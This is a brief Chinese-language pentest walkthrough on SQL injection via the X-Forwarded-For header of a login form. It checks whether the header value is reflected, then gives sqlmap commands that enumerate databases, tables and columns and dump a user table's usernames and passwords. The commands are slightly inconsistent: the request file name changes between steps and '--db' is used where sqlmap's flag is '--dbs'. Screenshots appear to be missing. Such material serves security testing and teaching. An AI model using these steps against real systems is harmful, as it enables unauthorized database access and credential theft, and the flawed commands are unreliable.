X-Forwarded-For注入漏洞

测试思路

1、登录后台提示ip信息不正确，这种情况一般是x-forwarded-for读取客户端ip

2、通过在数据包添加x-forwarded-for:1.1.1.1看 respone包中是否存在1.1.1.1

3、如果存在则证明用x-forwarded-for读取客户端数据，则存在注入漏洞

4、通过在登录框数据包中添加x-forwarded-for:*，用sqlmap 跑注入,跑数据库名，表名，字段名，字段内容

测试步骤

1、登陆随意输入密码，返回提示

 

 

 2、在数据包添加x-forwarded-for:1.1.1.1看 respone包中是否存在1.1.1.1

 

 

 

 

 

 3、存在此漏洞，保存请求包到1.txt里（X-Forwarded-For值改为*）

 

 

 4、使用sqlmap开始跑，

    1）sqlmap爆出库名：sqlmap -r d:/aaa.txt --db --batch

    2）表名:sqlmap -r d:/aaa.txt -D webcalender --tables --batch

    3）字段：sqlmap -r d:/aa.txt -D webcalender -T user --columns --batch 

    4）字段内容：sqlmap -r d:/aa.txt -D webcalender -T user -C 'user,password' --batch

获取账号与密码